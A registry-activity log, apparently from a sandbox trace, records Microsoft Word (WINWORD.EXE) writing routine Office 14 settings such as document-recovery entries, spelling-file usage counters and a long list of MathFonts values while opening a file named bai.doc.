HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
k=(
6B3D28000C0E000006000000010000006400000002000000540000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C006200610069002E0064006F006300000000000000
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831954
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831955
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{38CF48FE-4F55-45D3-8F12-841887115B84}
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1A301B
1A301B
040000000C0E00002900000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004200610069002E0064006F006300070000004200610069002E0064006F0063000000000001000000000000002C344CBF74DAD4011B301A001B301A0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3596
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831849
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831850
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831849
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831850
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831870
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831871
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831851
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831852
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831851
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831852
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831872
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831873
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
#i(
236928000C0E000006000000010000006400000002000000540000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C006200610069002E0064006F006300000000000000
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831874
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831875
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831876
3596
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831877
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3596
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3596
WINWORD.EXE
write
